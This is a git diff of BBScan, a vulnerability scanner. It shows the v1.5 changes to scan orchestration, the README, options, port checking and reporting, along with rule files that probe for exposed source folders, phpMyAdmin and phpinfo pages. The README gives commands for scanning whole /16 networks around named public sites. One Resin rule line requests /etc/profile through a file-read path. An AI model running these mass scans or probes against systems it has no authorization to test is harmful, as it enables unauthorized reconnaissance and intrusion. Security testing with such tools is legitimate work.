- ips_to_scan = [] # all IPs to scan during current scan
-
- global_lock = multiprocessing.Manager().Lock()
- print_msg('BBScan v1.4')
- q_results = multiprocessing.Manager().Queue()
- q_targets = multiprocessing.Manager().Queue()
- target_process_done = multiprocessing.Value('i', 0)
-
- for input_file in input_files:
+ print('* BBScan v1.5 https://github.com/lijiejie/BBScan *')
+ if args.no_scripts:
+ print('* Scripts scan was disabled.')
+ if args.require_ports:
+ print('* Scripts scan port check: %s' % ','.join([str(x) for x in args.require_ports]))
+
+ q_targets = multiprocessing.Manager().Queue() # targets Queue
+ q_results = multiprocessing.Manager().Queue() # results Queue
+ # whether target processing is done
+ # scan processes may start to exit only after all targets have been imported
+ process_targets_done = multiprocessing.Value('i', 0)
+ tasks_count = multiprocessing.Value('i', 0)  # task counter
+
+ for input_file in args.input_files:
if args.host:
- lines = args.host
+ target_list = args.host
+ # few targets from the command line: create at most twice as many scan processes
+ if args.network == 32 and len(target_list) * 2 < args.p:
+ args.p = len(target_list) * 2
elif args.f or args.d:
with open(input_file) as inFile:
- lines = inFile.readlines()
-
+ target_list = inFile.readlines()
+ # few targets read from file: create at most twice as many scan processes
+ if args.network == 32 and len(target_list) * 2 < args.p:
+ args.p = len(target_list) * 2
try:
- print_msg('Init %s scan process, please wait' % args.p)
- STOP_ME = False
- while q_results.qsize() > 0:
- q_results.get()
- while q_targets.qsize() > 0:
- q_targets.get()
- target_process_done.value = 0
- threading.Thread(target=save_report, args=(q_results, input_file)).start()
+ # generate the report and manage standard output
+ threading.Thread(target=save_report, args=(args, q_results, input_file, tasks_count)).start()
+
+ clear_queue(q_results)
+ clear_queue(q_targets)
+ process_targets_done.value = 0
+ start_time = time.time()
if args.crawler:
_input_files = glob.glob(args.crawler + '/*.log')
for _file in _input_files:
- q_targets.put({'file': _file, 'url': ''})
+ q_targets.put({'file': _file})
+ tasks_count.value += 1
+ if tasks_count.value < args.p:
+ args.p = tasks_count.value  # only a few sites were imported
+ process_targets_done.value = 1
else:
- queue_hosts = Queue.Queue()
- for line in lines:
- if line.strip():
- # Work with https://github.com/lijiejie/subDomainsBrute
- # Delimiter "," accepted
- hosts = line.replace(',', ' ').strip().split()
- queue_hosts.put(hosts[0])
-
- threading.Thread(target=process_target).start()
+ # use gevent safely inside a separate process
+ tasks_count.value = 0
+ p = multiprocessing.Process(
+ target=prepare_targets,
+ args=(target_list, q_targets, q_results, args, tasks_count, process_targets_done))
+ p.daemon = True
+ p.start()
+ time.sleep(1.0)  # give the prepare_targets process a head start
all_process = []
for _ in range(args.p):
p = multiprocessing.Process(
- target=scan_process, args=(q_targets, q_results, global_lock, args, target_process_done))
+ target=scan_process,
+ args=(q_targets, q_results, args, process_targets_done))
p.daemon = True
p.start()
all_process.append(p)
+ q_results.put('%s scan process created.' % args.p)
+
while True:
for p in all_process[:]:
if not p.is_alive():
all_process.remove(p)
if not all_process:
break
- time.sleep(0.1)
+ time.sleep(0.5)
+
+ cost_time = time.time() - start_time
+ cost_min = int(cost_time / 60)
+ cost_min = '%s min ' % cost_min if cost_min > 0 else ''
+ cost_seconds = '%.1f' % (cost_time % 60)
+ q_results.put('Scanned %s targets in %s%s seconds.' % (tasks_count.value, cost_min, cost_seconds))
except KeyboardInterrupt as e:
- STOP_ME = True
- print_msg('You aborted the scan.')
- exit(1)
+ config.stop_me = True
+ q_results.put('Scan aborted.')
+ exit(-1)
except Exception as e:
- print_msg('[__main__.exception] %s %s' % (type(e), str(e)))
- STOP_ME = True
+ q_results.put('[__main__.exception] %s %s' % (type(e), str(e)))
+ config.stop_me = True
diff --git a/README.md b/README.md
index 74ae332..f362720 100644
--- a/README.md
+++ b/README.md
@@ -1,72 +1,122 @@
-# BBScan 1.4 #
-
-A vulnerability scanner focus on scanning large number of targets in short time with a minimal set of rules.
-
-**BBScan** 用于渗透测试前期,快速地对大量目标进行扫描,发现信息泄露等常见漏洞,找到可能的突破入口。
-
-它的特点是快速,规则配置简单。
-
-## Change Log
-
-* [2019-05-13] BBScan 1.4 with scan strategy optimized.
-
-## Install ##
-
-Install required packages with pip
-
- pip install -r requirements.txt
-
-## Usage ##
-
- usage: BBScan.py [options]
-
- * A tiny Batch weB+ vulnerability Scanner. *
- By LiJieJie (http://www.lijiejie.com)
-
- optional arguments:
- -h, --help show this help message and exit
- --host [HOST [HOST2 HOST3 ...] [HOST [HOST2 HOST3 ...] ...]]
- Scan several hosts from command line
- -f TargetFile Load new line delimited targets from TargetFile
- -d TargetDirectory Load all *.txt files from TargetDirectory
- --crawler CrawlDirectory
- Load all *.log crawl files from CrawlDirectory
- --full Process all sub directories.
- -n, --no-crawl No crawling, sub folders will not be processed.
- -nn, --no-check404 No HTTP 404 existence check
- --scripts-only Scan with user scripts only
- --no-scripts Disable user scripts scan
- -p PROCESS Num of processes running concurrently, 30 by default
- -t THREADS Num of scan threads for each scan process, 3 by default
- --network MASK Scan all Target/MASK hosts,
- should be an int between 24 and 31
- --timeout Timeout Max scan minutes for each website, 10 by default
- -nnn, --no-browser Do not auto open web browser after scan finished
- -md Save scan report as markdown format
+# BBScan 1.5 #
+
+**BBScan** is a fast, highly concurrent vulnerability scanner. It can be used to
+
+* scan the whole network with a simple plugin or rule right after a high-risk vulnerability breaks out
+* serve as a routine inspection component integrated into an existing vulnerability scanning system
+
+It is fast:
+
+* A class B network (65534 hosts) can be scanned within 4 minutes (e.g. detecting Samba MS17010)
+* Within one minute, it can discover specified open ports on more than 20,000 IP addresses while verifying vulnerabilities
+* Within one minute, it can discover the HTTP services (80/443) of more than 1,000 websites while requesting a specified URL to detect vulnerabilities
+
+------
+
+### Install ###
+
+ pip2.7 install -r requirements.txt
+
+### Getting Started
+
+* ##### **Scan a class B network with one or more plugins**
+
+```
+python BBScan.py --scripts-only --script redis_unauthorized_access --host www.site.com --network 16
+```
+
+The command above scans www.site.com/16 with the `redis_unauthorized_access` plugin; the scan takes about 2 to 4 minutes.
+
+* ##### Scan all targets in a file with one or more rules
+
+```
+python BBScan.py --no-scripts --rule git_and_svn --no-check404 --no-crawl -f iqiyi.txt
+```
+
+The command above scans all targets in `iqiyi.txt` (one target per line) with the rules from the `git_and_svn` rule file.
+
+`--no-check404` disables the HTTP 404 existence check.
+
+`--no-crawl` disables crawling of sub folders.
+
+Setting these two options significantly reduces the number of HTTP requests.
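+
+Each line of a rule file describes one check: a path to request, followed by match conditions in curly braces. An illustrative line in the style of the bundled `rules/*.txt` files (the path and tag here are made up for the example):
+
+```
+/.svn/entries {status=200} {tag="dir"} {root_only}
+```
+
+`{status=...}` matches the response status code, `{tag="..."}` requires the response body to contain the given text, and `{root_only}` restricts the rule to the website root.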
+
+### Options ###
+
+**Setting scan targets**
+
+ --host [HOST [HOST ...]]
+ Specify one or more domain names / IPs
+ -f TargetFile Load targets from TargetFile, one per line
+ -d TargetDirectory Load all *.txt files from TargetDirectory; each file holds newline-delimited targets
+ --network MASK Set a network mask (8 ~ 31) combined with any of the 3 options above; all IPs in the
+ Target/MASK network will be scanned
+
+**HTTP scan**
+
+ --rule [RuleFileName [RuleFileName ...]]
+ Scan with the specified rule files only
+ -n, --no-crawl Disable crawling; other links on the page will not be processed
+ -nn, --no-check404 Disable the HTTP 404 status check
+ --full Process all sub directories: for a link like /x/y/z/, /x/ and /x/y/ are also scanned
+
+**Script scan**
+
+ --scripts-only Scan with scripts only; disable the HTTP rule scan
+ --script [ScriptName [ScriptName ...]]
+ Execute the specified scripts only
+ --no-scripts Disable all scripts
+
+**Concurrency**
+
+```
+ -p PROCESS Num of scan processes, 30 by default; 10 ~ 50 recommended
+ -t THREADS Num of scan threads per target, 3 by default; 3 ~ 10 recommended
+```
+
+**Other options**
+
+ --timeout TIMEOUT Max scan minutes for each target, 10 by default
+ -md Save the scan report in markdown format
+ --save-ports PortsDataFile
+ Save open ports to PortsDataFile; the file can be imported and reused
+ --debug Print debug information
+ -nnn, --no-browser Do not open the scan report in the default browser
-v show program's version number and exit
+### Tips
+
+* **How to use BBScan as a fast port scanner?**
+
+Open scripts/tools/port_scan.py and fill in the list of ports to scan. Move the file into the scripts folder, then run
+
+```
+python BBScan.py --scripts-only --script port_scan --host www.baidu.com --network 16 --save-ports ports_80.txt
+```
+
+`--save-ports` is a very useful option: the ports discovered during each run are saved to a file that can be fed back in later, as shown below.
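+
+The saved file holds one `host:port` pair per line (the format written by add_target in BBScan.py); the values below are made up for illustration:
+
+```
+10.1.2.3:80
+10.1.2.4:443
+```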
-**1. Scan several hosts from command line**
+* **How to watch the scan progress**
- python BBScan.py --host www.a.com www.b.com
+Set the `--debug` option to check whether scripts are executed and HTTP requests are sent as expected.
-**2. Scan www.target.com and all the other IPs under www.target.com/28**
+* **How to write a script (plugin)**
- python BBScan.py --host www.target.com --network 28
-
-**3. Load newline delimited targets from file and scan**
-
- python BBScan.py -f wandoujia.com.txt
+Refer to the scripts under the scripts folder. The self argument is a Scanner object; any method or attribute of the Scanner object can be used.
-**4. Load all targets from Directory(\*.txt file only) and scan**
+`self.host` `self.port` are the target host and port
- python BBScan.py -d targets/
+`self.ports_open` is the set of open ports, shared by all scripts. Scripts normally should not scan ports again on their own
-**5. Load crawler logs from Directory(\*.log file only) and scan**
+`self.conn_pool` is the HTTP connection pool
- python BBScan.py --crawler crawler_logs/
+`self.http_request` sends an HTTP GET request
-crawler log files should be formarted first:
+`self.index_headers` `self.index_status` `self.index_html_doc` hold the response of the index page. Once the scanner finds a script that depends on them, it requests the index page in advance and caches the response for all scripts to share
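+
+A minimal script sketch following the conventions above (the file name, port number, and check logic are placeholders, not a shipped plugin):
+
+```python
+# scripts/example_check.py -- hypothetical example
+from lib.common import save_script_result
+
+ports_to_check = [6379]  # ports this script depends on; parsed from the source by lib/cmdline.py
+
+
+def do_check(self, url):
+    # the scanner calls do_check(self, url) for every queued URL; run once per target
+    if url != '/':
+        return
+    if 6379 not in self.ports_open:
+        return
+    # ... real detection logic goes here, e.g. connect to self.host:6379 ...
+    save_script_result(self, '', 'redis://%s:6379' % self.host, '', 'Redis Unauthorized Access')
+```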
- . GET http://www.iqiyi.com/ HTTP/1.1^^^200
- . POST http://www.pps.tv/login.php HTTP/1.1^^^user=admin&passwd=admin^^^200
\ No newline at end of file
diff --git a/lib/cmdline.py b/lib/cmdline.py
index bd8e418..bf4f664 100644
--- a/lib/cmdline.py
+++ b/lib/cmdline.py
@@ -1,4 +1,5 @@
#!/usr/bin/env python
+# -*- encoding: utf-8 -*-
#
# Parse command line arguments
#
@@ -7,67 +8,88 @@
import argparse
import sys
import os
+import glob
+import re
def parse_args():
parser = argparse.ArgumentParser(prog='BBScan',
formatter_class=argparse.RawTextHelpFormatter,
- description='* A tiny Batch weB vulnerability Scanner. *\n'
- 'By LiJieJie (http://www.lijiejie.com)',
+ description='* A fast vulnerability Scanner. *\n'
+ 'By LiJieJie & Vivian (http://www.lijiejie.com)',
usage='BBScan.py [options]')
- parser.add_argument('--host', metavar='HOST [HOST2 HOST3 ...]', type=str, default='', nargs='*',
- help='Scan several hosts from command line')
-
- parser.add_argument('-f', metavar='TargetFile', type=str, default='',
- help='Load new line delimited targets from TargetFile')
-
- parser.add_argument('-d', metavar='TargetDirectory', type=str, default='',
- help='Load all *.txt files from TargetDirectory')
-
- parser.add_argument('--crawler', metavar='CrawlDirectory', type=str, default='',
- help='Load all *.log crawl files from CrawlDirectory')
-
- parser.add_argument('--full', dest='full_scan', default=False, action='store_true',
- help='Process all sub directories.')
-
- parser.add_argument('-n', '--no-crawl', dest='no_crawl', default=False, action='store_true',
- help='No crawling, sub folders will not be processed.')
-
- parser.add_argument('-nn', '--no-check404', dest='no_check404', default=False, action='store_true',
- help='No HTTP 404 existence check')
-
- parser.add_argument('--scripts-only', dest='scripts_only', default=False, action='store_true',
- help='Scan with user scripts only')
-
- parser.add_argument('--no-scripts', dest='no_scripts', default=False, action='store_true',
- help='Disable user scripts scan')
-
- parser.add_argument('-p', metavar='PROCESS', type=int, default=30,
- help='Num of processes running concurrently, 30 by default')
-
- parser.add_argument('-t', metavar='THREADS', type=int, default=3,
- help='Num of scan threads for each scan process, 3 by default')
-
- parser.add_argument('--network', metavar='MASK', type=int, default=32,
- help='Scan all Target/MASK hosts, \nshould be an int between 24 and 31')
-
- parser.add_argument('--timeout', metavar='Timeout', type=int, default=10,
- help='Max scan minutes for each website, 10 by default')
-
- parser.add_argument('-nnn', '--no-browser', dest='no_browser', default=False, action='store_true',
- help='Do not auto open web browser after scan finished')
-
- parser.add_argument('-md', default=False, action='store_true',
- help='Save scan report as markdown format')
-
- parser.add_argument('-v', action='version', version='%(prog)s 1.4 By LiJieJie')
+ group_target = parser.add_argument_group('Targets', '')
+ group_target.add_argument('--host', metavar='HOST', type=str, default='', nargs='*',
+ help='Scan several hosts from command line')
+ group_target.add_argument('-f', metavar='TargetFile', type=str, default='',
+ help='Load new line delimited targets from TargetFile')
+ group_target.add_argument('-d', metavar='TargetDirectory', type=str, default='',
+ help='Load all *.txt files from TargetDirectory')
+ group_target.add_argument('--crawler', metavar='CrawlDirectory', type=str, default='',
+ help='Load all *.log crawl files from CrawlDirectory')
+ group_target.add_argument('--network', metavar='MASK', type=int, default=32,
+ help='Scan all Target/MASK neighbour hosts, \nshould be an int between 8 and 31')
+
+ group_http = parser.add_argument_group('HTTP SCAN', '')
+ group_http.add_argument('--rule', metavar='RuleFileName', type=str, default='', nargs='*',
+ help='Import specified rule files only.')
+ group_http.add_argument('-n', '--no-crawl', dest='no_crawl', default=False, action='store_true',
+ help='No crawling, sub folders will not be processed')
+ group_http.add_argument('-nn', '--no-check404', dest='no_check404', default=False, action='store_true',
+ help='No HTTP 404 existence check')
+ group_http.add_argument('--full', dest='full_scan', default=False, action='store_true',
+ help='Process all sub directories')
+
+ group_scripts = parser.add_argument_group('Scripts', '')
+ group_scripts.add_argument('--scripts-only', dest='scripts_only', default=False, action='store_true',
+ help='Scan with user scripts only')
+ group_scripts.add_argument('--script', metavar='ScriptName', type=str, default='', nargs='*',
+ help='Execute specified scripts only')
+ # global switch
+ group_scripts.add_argument('--no-scripts', dest='no_scripts', default=False, action='store_true',
+ help='Disable all scripts')
+
+ group_concurrent = parser.add_argument_group('CONCURRENT', '')
+ group_concurrent.add_argument('-p', metavar='PROCESS', type=int, default=30,
+ help='Num of processes running concurrently, 30 by default')
+ group_concurrent.add_argument('-t', metavar='THREADS', type=int, default=3,
+ help='Num of scan threads for each scan process, 3 by default')
+
+ group_other = parser.add_argument_group('OTHER', '')
+
+ group_other.add_argument('--timeout', metavar='TIMEOUT', type=int, default=10,
+ help='Max scan minutes for each target, 10 by default')
+
+ group_other.add_argument('-md', default=False, action='store_true',
+ help='Save scan report as markdown format')
+
+ group_other.add_argument('--save-ports', metavar='PortsDataFile', dest='save_ports', type=str, default='',
+ help='Save open ports to PortsDataFile')
+
+ group_other.add_argument('--debug', default=False, action='store_true',
+ help='Show verbose debug info')
+
+ group_other.add_argument('-nnn', '--no-browser', dest='no_browser', default=False, action='store_true',
+ help='Do not open web browser to view report')
+
+ group_other.add_argument('-v', action='version',
+ version='%(prog)s 1.5 (https://github.com/lijiejie/BBScan)')
if len(sys.argv) == 1:
sys.argv.append('-h')
args = parser.parse_args()
check_args(args)
+ if args.f:
+ args.input_files = [args.f]
+ elif args.d:
+ args.input_files = glob.glob(args.d + '/*.txt')
+ elif args.crawler:
+ args.input_files = ['crawler']
+ elif args.host:
+ args.input_files = ['hosts']
+
return args
@@ -78,18 +100,75 @@ def check_args(args):
' -d TargetDirectory \n' \
' --crawler TargetDirectory \n' \
' --host www.host1.com www.host2.com 8.8.8.8'
- print msg
+ print(msg)
exit(-1)
if args.f and not os.path.isfile(args.f):
- print '[ERROR] TargetFile not found: %s' % args.f
+ print('[ERROR] TargetFile not found: %s' % args.f)
exit(-1)
if args.d and not os.path.isdir(args.d):
- print '[ERROR] TargetDirectory not found: %s' % args.f
+ print('[ERROR] TargetDirectory not found: %s' % args.d)
exit(-1)
args.network = int(args.network)
- if not (24 <= args.network <= 32):
- print '[ERROR] Network should be an integer between 24 and 31'
+ if not (8 <= args.network <= 32):
+ print('[ERROR] Network should be an integer between 8 and 32')
exit(-1)
+
+ args.rule_files = []
+ if args.rule:
+ for rule_name in args.rule:
+ if not rule_name.endswith('.txt'):
+ rule_name += '.txt'
+ if not os.path.exists('rules/%s' % rule_name):
+ print('[ERROR] Rule file not found: %s' % rule_name)
+ exit(-1)
+ args.rule_files.append('rules/%s' % rule_name)
+
+ args.require_no_http = True  # no script relies on the HTTP connection pool
+ args.require_index_doc = False  # whether any script requires the index page
+ args.require_ports = set()  # ports required by the script scan
+ pattern = re.compile(r'ports_to_check.*?\=(.*)')
+
+ if not args.no_scripts:
+
+ if args.script:
+ for script_name in args.script:
+ if not script_name.lower().endswith('.py'):
+ script_name += '.py'
+ if not os.path.exists('scripts/%s' % script_name):
+ print('* Script file not found: %s' % script_name)
+ exit(-1)
+
+ for _script in glob.glob('scripts/*.py'):
+ script_name_origin = os.path.basename(_script)
+ script_name = script_name_origin.replace('.py', '')
+ if args.script and script_name not in args.script and script_name_origin not in args.script:
+ continue
+ if script_name.startswith('_'):
+ continue
+ with open(_script) as f:
+ content = f.read()
+ if content.find('self.http_request') > 0 or content.find('self.conn_pool.urlopen') > 0:
+ args.require_no_http = False # 插件依赖HTTP连接池
+ if content.find('self.index_') > 0:
+ args.require_no_http = False
+ args.require_index_doc = True
+
+ m = pattern.search(content)
+ if m:
+ m_str = m.group(1).strip()
+ if m_str.find('#') > 0:  # strip trailing comment
+ m_str = m_str[:m_str.find('#')]
+ if m_str.find('[') < 0:
+ if int(m_str) not in args.require_ports:
+ args.require_ports.add(int(m_str))
+ else:
+ for port in eval(m_str):
+ if port not in args.require_ports:
+ args.require_ports.add(int(port))
+
+ # open-port info will be written to a data file
+ if args.save_ports:
+ args.ports_file = None
diff --git a/lib/common.py b/lib/common.py
index b8dbb19..f5fcc74 100644
--- a/lib/common.py
+++ b/lib/common.py
@@ -1,16 +1,28 @@
#!/usr/bin/env python
+# -*- encoding: utf-8 -*-
#
# Common functions
#
import urlparse
import re
+import struct
+import platform
+from gevent import socket
+
+
+def clear_queue(this_queue):
+ try:
+ while True:
+ this_queue.get_nowait()
+ except Exception as e:
+ return
def parse_url(url):
_ = urlparse.urlparse(url, 'http')
if not _.netloc:
- _ = urlparse.urlparse('http://' + url, 'http')
+ _ = urlparse.urlparse('https://' + url, 'http')
return _.scheme, _.netloc, _.path if _.path else '/'
@@ -20,7 +32,7 @@ def decode_response_text(txt, charset=None):
return txt.decode(charset)
except Exception as e:
pass
- for _ in ['UTF-8', 'GB2312', 'GBK', 'iso-8859-1', 'big5']:
+ for _ in ['UTF-8', 'GBK', 'GB2312', 'iso-8859-1', 'big5']:
try:
return txt.decode(_)
except Exception as e:
@@ -70,7 +82,7 @@ def cal_depth(self, url):
return url, depth
-def save_user_script_result(self, status, url, title, vul_type=''):
+def save_script_result(self, status, url, title, vul_type=''):
self.lock.acquire()
# print '[+] [%s] %s' % (status, url)
if url not in self.results:
@@ -91,3 +103,41 @@ def escape(html):
return html.replace('&', '&amp;').\
    replace('<', '&lt;').replace('>', '&gt;').\
    replace('"', '&quot;').replace("'", '&#39;')
+
+
+def is_port_open(host, port):
+ try:
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.settimeout(3.0)
+ if s.connect_ex((host, int(port))) == 0:
+ return True
+ else:
+ return False
+ except Exception as e:
+ return False
+ finally:
+ try:
+ s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))
+ s.close()
+ except Exception as e:
+ pass
+
+
+def scan_given_ports(confirmed_open, confirmed_closed, host, ports):
+ checked_ports = confirmed_open.union(confirmed_closed)
+ ports_open = set()
+ ports_closed = set()
+
+ for port in ports:
+ if port in checked_ports:  # skip ports that are already confirmed
+ continue
+ if is_port_open(host, port):
+ ports_open.add(port)
+ else:
+ ports_closed.add(port)
+
+ return ports_open.union(confirmed_open), ports_closed.union(confirmed_closed)
+
+
+if __name__ == '__main__':
+ print(is_port_open('119.84.78.81', 80))
diff --git a/lib/config.py b/lib/config.py
new file mode 100644
index 0000000..41e4759
--- /dev/null
+++ b/lib/config.py
@@ -0,0 +1,9 @@
+# Global Variables share among modules
+
+stop_me = False
+
+user_agent = 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36'
+
+default_headers = {'User-Agent': user_agent, 'Connection': 'Keep-Alive', 'Range': 'bytes=0-102400'}
+
+ports_saved_to_file = False
\ No newline at end of file
diff --git a/lib/consle_width.py b/lib/consle_width.py
new file mode 100644
index 0000000..10b53c9
--- /dev/null
+++ b/lib/consle_width.py
@@ -0,0 +1,94 @@
+""" getTerminalSize()
+ - get width and height of console
+ - works on Linux, OS X, Windows, Cygwin (Windows)
+"""
+
+__all__ = ['getTerminalSize']
+
+
+def getTerminalSize():
+ import platform
+ current_os = platform.system()
+ tuple_xy = None
+ if current_os == 'Windows':
+ tuple_xy = _getTerminalSize_windows()
+ if tuple_xy is None:
+ tuple_xy = _getTerminalSize_tput()
+ # needed for window's python in cygwin's xterm!
+ if current_os == 'Linux' or current_os == 'Darwin' or current_os.startswith('CYGWIN'):
+ tuple_xy = _getTerminalSize_linux()
+ if tuple_xy is None:
+ tuple_xy = (80, 25) # default value
+ return tuple_xy
+
+
+def _getTerminalSize_windows():
+ res = None
+ try:
+ from ctypes import windll, create_string_buffer
+
+ # stdin handle is -10
+ # stdout handle is -11
+ # stderr handle is -12
+
+ h = windll.kernel32.GetStdHandle(-12)
+ csbi = create_string_buffer(22)
+ res = windll.kernel32.GetConsoleScreenBufferInfo(h, csbi)
+ except:
+ return None
+ if res:
+ import struct
+ (bufx, bufy, curx, cury, wattr,
+ left, top, right, bottom, maxx, maxy) = struct.unpack("hhhhHhhhhhh", csbi.raw)
+ sizex = right - left + 1
+ sizey = bottom - top + 1
+ return sizex, sizey
+ else:
+ return None
+
+
+def _getTerminalSize_tput():
+ # get terminal width
+ # src: http://stackoverflow.com/questions/263890/how-do-i-find-the-width-height-of-a-terminal-window
+ try:
+ import subprocess
+ proc = subprocess.Popen(["tput", "cols"], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
+ output = proc.communicate(input=None)
+ cols = int(output[0])
+ proc = subprocess.Popen(["tput", "lines"], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
+ output = proc.communicate(input=None)
+ rows = int(output[0])
+ return (cols, rows)
+ except:
+ return None
+
+
+def _getTerminalSize_linux():
+ def ioctl_GWINSZ(fd):
+ try:
+ import fcntl, termios, struct, os
+ cr = struct.unpack('hh', fcntl.ioctl(fd, termios.TIOCGWINSZ, '1234'))
+ except:
+ return None
+ return cr
+
+ cr = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2)
+ if not cr:
+ try:
+ fd = os.open(os.ctermid(), os.O_RDONLY)
+ cr = ioctl_GWINSZ(fd)
+ os.close(fd)
+ except:
+ pass
+ if not cr:
+ try:
+ env = os.environ
+ cr = (env['LINES'], env['COLUMNS'])
+ except:
+ return None
+ return int(cr[1]), int(cr[0])
+
+
+if __name__ == "__main__":
+ sizex, sizey = getTerminalSize()
+ print 'width =', sizex, 'height =', sizey
diff --git a/lib/report.py b/lib/report.py
index a544878..f4424ea 100644
--- a/lib/report.py
+++ b/lib/report.py
@@ -1,12 +1,22 @@
# -*- encoding: utf-8 -*-
# report template
+import time
+from string import Template
+import webbrowser
+import sys
+import codecs
+import os
+from lib.common import escape
+from lib.consle_width import getTerminalSize
+from lib import config
+
# template for html
html_general = """
-BBScan Scan Report
+BBScan 1.5 Scan Report
-Scan finished in ${cost_min} ${cost_seconds} seconds. BBScan v 1.4
+Scanned ${tasks_processed_count} targets in
+${cost_min} ${cost_seconds} seconds.
+${vulnerable_hosts_count} vulnerable hosts found in total.
${content}
@@ -50,7 +62,9 @@
# template for markdown
markdown_general = """
# BBScan Scan Report
-Version:v 1.4
+Version: v 1.5
+Num of targets: ${tasks_processed_count}
+Num of vulnerable hosts: ${vulnerable_hosts_count}
Time cost: ${cost_min} ${cost_seconds} seconds
${content}
"""
@@ -76,3 +90,104 @@
'html': html,
'markdown': markdown
}
+
+
+def save_report(args, _q_results, _file, tasks_processed_count):
+
+ is_markdown = args.md
+ no_browser = args.no_browser
+ start_time = time.time()
+ a_template = template['markdown'] if is_markdown else template['html']
+ t_general = Template(a_template['general'])
+ t_host = Template(a_template['host'])
+ t_list_item = Template(a_template['list_item'])
+ output_file_suffix = a_template['suffix']
+ report_name = '%s_%s%s' % (os.path.basename(_file).lower().replace('.txt', ''),
+ time.strftime('%Y%m%d_%H%M%S', time.localtime()),
+ output_file_suffix)
+
+ html_doc = content = ""
+ vulnerable_hosts_count = 0
+ console_width = getTerminalSize()[0] - 2
+
+ try:
+ while not config.stop_me or _q_results.qsize() > 0:
+ if _q_results.qsize() == 0:
+ time.sleep(0.1)
+ continue
+
+ while _q_results.qsize() > 0:
+ item = _q_results.get()
+ if type(item) is str:
+ message = '[%s] %s' % (time.strftime('%H:%M:%S', time.localtime()), item)
+ if not args.debug and args.network <= 22 and \
+ (item.startswith('Scan ') or item.startswith('No ports open')):
+ sys.stdout.write(message + (console_width - len(message)) * ' ' + '\r')
+ else:
+ print(message)
+ continue
+ host, results = item
+ vulnerable_hosts_count += 1
+
+ # print
+ for key in results.keys():
+ for url in results[key]:
+ print(' [+]%s %s' % (' [%s]' % url['status'] if url['status'] else '', url['url']))
+
+ _str = ""
+ for key in results.keys():
+ for _ in results[key]:
+ _str += t_list_item.substitute(
+ {'status': ' [%s]' % _['status'] if _['status'] else '',
+ 'url': _['url'],
+ 'title': '[%s]' % _['title'] if _['title'] else '',
+ 'vul_type': escape(_['vul_type'].replace('_', ' ')) if 'vul_type' in _ else ''}
+ )
+ _str = t_host.substitute({'host': host, 'list': _str})
+ content += _str
+
+ cost_time = time.time() - start_time
+ cost_min = int(cost_time / 60)
+ cost_min = '%s min' % cost_min if cost_min > 0 else ''
+ cost_seconds = '%.2f' % (cost_time % 60)
+
+ html_doc = t_general.substitute(
+ {'tasks_processed_count': tasks_processed_count.value,
+ 'vulnerable_hosts_count': vulnerable_hosts_count,
+ 'cost_min': cost_min, 'cost_seconds': cost_seconds, 'content': content}
+ )
+
+ with codecs.open('report/%s' % report_name, 'w', encoding='utf-8') as outFile:
+ outFile.write(html_doc)
+
+ if config.ports_saved_to_file:
+ print('* Ports data saved to %s' % args.save_ports)
+
+ if html_doc:
+
+ cost_time = time.time() - start_time
+ cost_min = int(cost_time / 60)
+ cost_min = '%s min' % cost_min if cost_min > 0 else ''
+ cost_seconds = '%.1f' % (cost_time % 60)
+
+ html_doc = t_general.substitute(
+ {'tasks_processed_count': tasks_processed_count.value,
+ 'vulnerable_hosts_count': vulnerable_hosts_count,
+ 'cost_min': cost_min, 'cost_seconds': cost_seconds, 'content': content}
+ )
+
+ with codecs.open('report/%s' % report_name, 'w', encoding='utf-8') as outFile:
+ outFile.write(html_doc)
+
+        print('\n* %s vulnerable hosts found in total.' % vulnerable_hosts_count)
+ print('* Scan report saved to report/%s' % report_name)
+ if not no_browser:
+ webbrowser.open_new_tab(os.path.abspath('report/%s' % report_name))
+ else:
+        print('\n* No vulnerabilities found for targets in %s.' % _file)
+
+ except Exception as e:
+ print('[save_report_thread Exception] %s %s' % (type(e), str(e)))
+ import traceback
+ traceback.print_exc()
+ sys.exit(-1)
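
save_report drains q_results and dispatches on item type: plain strings become timestamped console lines, while (host, results) tuples are counted and rendered into the report. A producer-side sketch of that queue protocol, with hypothetical host and finding values:

    q_results.put('Scan 10.0.0.1 completed')     # printed as a '[HH:MM:SS] ...' log line
    q_results.put(('10.0.0.1', {                 # rendered into the HTML/Markdown report
        'redis_unauthorized_access': [
            {'status': '', 'url': 'redis://10.0.0.1:6379', 'title': '',
             'vul_type': 'Redis_Unauthorized_Access'}
        ]
    }))
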
diff --git a/requirements.txt b/requirements.txt
index ffc96a8..ead9f67 100644
--- a/requirements.txt
+++ b/requirements.txt
@@ -2,3 +2,6 @@ BeautifulSoup4>=4.3.2
py2-ipaddress>=3.4.1
pymongo
requests
+urllib3
+gevent
+grequests
\ No newline at end of file
diff --git a/rules/phpinfo_or_apc.txt b/rules/phpinfo_or_apc.txt
index 1bcf793..79dfd3d 100644
--- a/rules/phpinfo_or_apc.txt
+++ b/rules/phpinfo_or_apc.txt
@@ -5,7 +5,3 @@
/i.php {tag="allow_url_fopen"} {status=200} {type="html"}
/php.php {tag="allow_url_fopen"} {status=200} {type="html"}
/apc.php {status=200} {tag="APC INFO"} {root_only}
-
-
-
-
diff --git a/rules/phpmyadmin.txt b/rules/phpmyadmin.txt
index 6915aea..dfa2ebe 100644
--- a/rules/phpmyadmin.txt
+++ b/rules/phpmyadmin.txt
@@ -2,4 +2,4 @@
/phpmyadmin/index.php {tag="phpMyAdmin"} {status=200} {root_only}
/phpMyAdmin/index.php {tag="phpMyAdmin"} {status=200} {root_only}
/_phpmyadmin/index.php {tag="phpMyAdmin"} {status=200} {root_only}
-/pma/index.php {tag="phpMyAdmin"} {status=200} {root_only}
\ No newline at end of file
+/pma/index.php {tag="phpMyAdmin"} {status=200} {root_only}
diff --git a/rules/resin_admin.txt b/rules/resin_admin.txt
index fda3ce8..44ca6d0 100644
--- a/rules/resin_admin.txt
+++ b/rules/resin_admin.txt
@@ -1,4 +1,4 @@
# Resin Doc
/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/profile {tag="/etc/profile.d/*.sh"} {root_only}
# /resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp {tag="This is the default start page for the Resin server"} {root_only}
